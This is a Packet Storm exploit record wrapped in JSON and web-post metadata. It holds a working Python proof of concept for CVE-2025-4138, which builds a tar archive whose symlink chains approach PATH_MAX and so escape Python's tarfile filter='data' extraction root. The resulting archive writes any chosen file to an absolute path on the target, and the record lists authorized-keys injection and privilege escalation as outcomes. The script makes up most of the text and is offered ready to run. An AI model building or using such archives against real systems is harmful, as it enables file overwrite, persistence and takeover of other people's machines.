{“lastseen”:”2026-02-19T16:34:35″,”description”:”This proof of concept exploit targets CVE-2025-4138, a vulnerability in Python’s built-in tarfile module when extracting archives using filter=\\”data\\”. The issue allows a crafted archive to bypass intended path restrictions by abusing filesystem path…”,”published”:”2026-02-19T00:00:00″,”modified”:”2026-02-19T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Python Tarfile Bypass”,”source”:””,”references”:””,”id”:”PACKETSTORM:215859″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-4138″],”sourceData”:”=============================================================================================================================================\\n | # Title : Python tarfile filter=\\”data\\” Bypass via PATH_MAX Symlink Chain |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.3 (64 bits) |\\n | # Vendor : https:\/\/www.python.org\/ |\\n =============================================================================================================================================\\n \\n [+] Summary : This Proof of Concept (PoC) targets CVE-2025-4138, a vulnerability in Python\u2019s built-in tarfile module when extracting archives using filter=\\”data\\”.\\n The issue allows a crafted archive to bypass intended path restrictions by abusing filesystem path length handling and symbolic link resolution.\\n \\n [+] The attack relies on:\\n \\n Building a deep symlink chain that approaches the system\u2019s PATH_MAX limit.\\n \\n Using very long directory names (247 characters each) repeated across multiple nested levels.\\n \\n Creating carefully structured symbolic links that pivot path resolution outside the intended extraction directory.\\n \\n Writing an arbitrary file to an absolute attacker-controlled path, escaping the extraction root.\\n \\n The technique manipulates path normalization and symlink resolution behavior during archive extraction.\\n \\n [+] Key Characteristics :\\n \\n Dynamically detects PATH_MAX depending on OS:\\n \\n Linux (typically 4096)\\n \\n macOS (typically 1024)\\n \\n Windows (MAX_PATH 260)\\n \\n Generates a malicious .tar archive.\\n \\n Allows custom file permission mode for the payload.\\n \\n Includes a –check-only mode to test whether the system may be vulnerable without building the archive.\\n \\n Requires the target file path to be absolute.\\n \\n [+] Affected Versions :\\n \\n Python 3.12.0 \u2013 3.12.10\\n \\n Python 3.13.0 \u2013 3.13.3\\n \\n [+] Fixed In ;\\n \\n Python 3.12.11\\n \\n Python 3.13.4\\n \\n [+] Impact :\\n \\n If a vulnerable system extracts a malicious archive using tarfile with filter=\\”data\\” and insufficient path validation:\\n \\n Arbitrary file write outside the intended extraction directory becomes possible.\\n \\n [+] This may lead to:\\n \\n Configuration overwrite\\n \\n Authorized keys injection\\n \\n Service hijacking\\n \\n Privilege escalation (depending on execution context)\\n \\n Impact severity depends on:\\n \\n The privileges of the extraction process\\n \\n The writable filesystem locations\\n \\n Application behavior after extraction\\n \\n [+] POC : \\n \\n #!\/usr\/bin\/env python3\\n \\n import argparse\\n import io\\n import os\\n import tarfile\\n import sys\\n \\n DIR_LEN = 247\\n \\n CHARS = \\”abcdefghijklmnop\\”\\n \\n def get_path_max():\\n \\”\\”\\”Determine PATH_MAX based on the operating system\\”\\”\\”\\n import platform\\n system = platform.system()\\n if system == \\”Linux\\”:\\n return 4096\\n elif system == \\”Darwin\\”: \\n return 1024\\n elif system == \\”Windows\\”:\\n return 260 \\n else:\\n return 4096 \\n \\n def build_tar(tar_path, target_file, payload, mode):\\n \\n if not os.path.isabs(target_file):\\n raise ValueError(f\\”Target path must be absolute: {target_file}\\”)\\n \\n target_dir = os.path.dirname(target_file)\\n target_name = os.path.basename(target_file)\\n \\n if not target_name:\\n raise ValueError(f\\”Target file has no basename: {target_file}\\”)\\n \\n long_dir = \\”d\\” * DIR_LEN \\n path_max = get_path_max()\\n \\n print(f\\”[*] PATH_MAX detected: {path_max}\\”)\\n print(f\\”[*] Chain length: {len(CHARS) * DIR_LEN} bytes\\”)\\n \\n if len(CHARS) * DIR_LEN \\u003e= path_max:\\n print(f\\”[!] Warning: Chain length may exceed PATH_MAX on this system\\”)\\n \\n with tarfile.open(tar_path, \\”w\\”) as tar:\\n prefix = \\”\\”\\n for i, char in enumerate(CHARS):\\n \\n d = tarfile.TarInfo(os.path.join(prefix, long_dir))\\n d.type = tarfile.DIRTYPE\\n d.mode = 0o755 \\n d.uid = 0\\n d.gid = 0\\n d.uname = \\”root\\”\\n d.gname = \\”root\\”\\n tar.addfile(d)\\n \\n s = tarfile.TarInfo(os.path.join(prefix, char))\\n s.type = tarfile.SYMTYPE\\n s.linkname = long_dir\\n s.mode = 0o777 \\n s.size = 0 \\n s.uid = 0\\n s.gid = 0\\n tar.addfile(s)\\n \\n prefix = os.path.join(prefix, long_dir)\\n \\n short_chain = \\”\/\\”.join(CHARS) # \\”a\/b\/c\/d\/e\/f\/g\/h\/i\/j\/k\/l\/m\/n\/o\/p\\”\\n pivot_name = os.path.join(short_chain, \\”l\\” * 254)\\n pivot = tarfile.TarInfo(pivot_name)\\n pivot.type = tarfile.SYMTYPE\\n pivot.linkname = \\”..\/\\” * len(CHARS) \\n pivot.mode = 0o777\\n pivot.size = 0\\n pivot.uid = 0\\n pivot.gid = 0\\n tar.addfile(pivot)\\n \\n escape_name = \\”escape\\”\\n escape = tarfile.TarInfo(escape_name)\\n escape.type = tarfile.SYMTYPE\\n \\n dir_count = len(CHARS) + 1 \\n target_dir_clean = target_dir.lstrip(‘\/’)\\n if target_dir_clean:\\n escape.linkname = pivot_name + \\”\/\\” + (\\”..\/\\” * dir_count) + target_dir_clean\\n else:\\n escape.linkname = pivot_name + \\”\/\\” + (\\”..\/\\” * dir_count)\\n \\n escape.mode = 0o777\\n escape.size = 0\\n escape.uid = 0\\n escape.gid = 0\\n tar.addfile(escape)\\n \\n f = tarfile.TarInfo(f\\”{escape_name}\/{target_name}\\”)\\n f.type = tarfile.REGTYPE\\n f.size = len(payload)\\n f.mode = mode\\n f.uid = 0\\n f.gid = 0\\n f.uname = \\”root\\”\\n f.gname = \\”root\\”\\n \\n print(f\\”[*] Adding payload: {f.name} -\\u003e {target_file}\\”)\\n print(f\\”[*] Payload size: {f.size} bytes\\”)\\n print(f\\”[*] File mode: {oct(f.mode)}\\”)\\n \\n tar.addfile(f, io.BytesIO(payload))\\n \\n print(f\\”[+] Malicious tar created: {tar_path}\\”)\\n \\n def main():\\n p = argparse.ArgumentParser(description=\\”CVE-2025-4138 tarfile filter bypass\\”)\\n p.add_argument(\\”-o\\”, \\”–output\\”, required=True, help=\\”output tar path\\”)\\n p.add_argument(\\”-t\\”, \\”–target\\”, required=True, help=\\”absolute path to write to on target\\”)\\n p.add_argument(\\”-p\\”, \\”–payload\\”, required=True, help=\\”File to use as a payload\\”)\\n p.add_argument(\\”-m\\”, \\”–mode\\”, required=False, default=\\”0644\\”, help=\\”Set file permissions (default: 0644)\\”)\\n p.add_argument(\\”–check-only\\”, action=\\”store_true\\”, help=\\”Only check if target is vulnerable\\”)\\n \\n args = p.parse_args()\\n \\n if not os.path.isabs(args.target):\\n print(f\\”[-] Error: Target path must be absolute: {args.target}\\”)\\n sys.exit(1)\\n \\n payload_path = os.path.expanduser(args.payload)\\n \\n if not os.path.exists(payload_path):\\n print(f\\”[-] Payload file not found: {payload_path}\\”)\\n sys.exit(1)\\n \\n with open(payload_path, \\”rb\\”) as fh:\\n payload = fh.read()\\n \\n if not payload.endswith(b\\”\\\\n\\”):\\n payload += b\\”\\\\n\\”\\n \\n if args.check_only:\\n print(\\”[*] Checking system vulnerability…\\”)\\n path_max = get_path_max()\\n chain_length = len(CHARS) * DIR_LEN\\n print(f\\”[*] PATH_MAX: {path_max}\\”)\\n print(f\\”[*] Chain length: {chain_length}\\”)\\n \\n if chain_length \\u003c path_max:\\n print(\\”[+] System appears vulnerable (chain length \\u003c PATH_MAX)\\”)\\n else:\\n print(\\”[-] System may not be vulnerable (chain length \\u003e= PATH_MAX)\\”)\\n return\\n \\n try:\\n build_tar(args.output, args.target, payload, int(args.mode, 8))\\n except Exception as e:\\n print(f\\”[-] Error: {e}\\”)\\n sys.exit(1)\\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n Greetings to :======================================================================\\n jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|\\n ====================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215859″,”cvss”:{“score”:7.5,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215859\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-19T16:34:35″,”description”:”This proof of concept exploit targets CVE-2025-4138, a vulnerability in Python’s built-in tarfile module when extracting archives using filter=\\”data\\”. The issue allows a crafted archive…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,16,12,15,13,53,7,11,5],"class_list":["post-41675","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-75","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n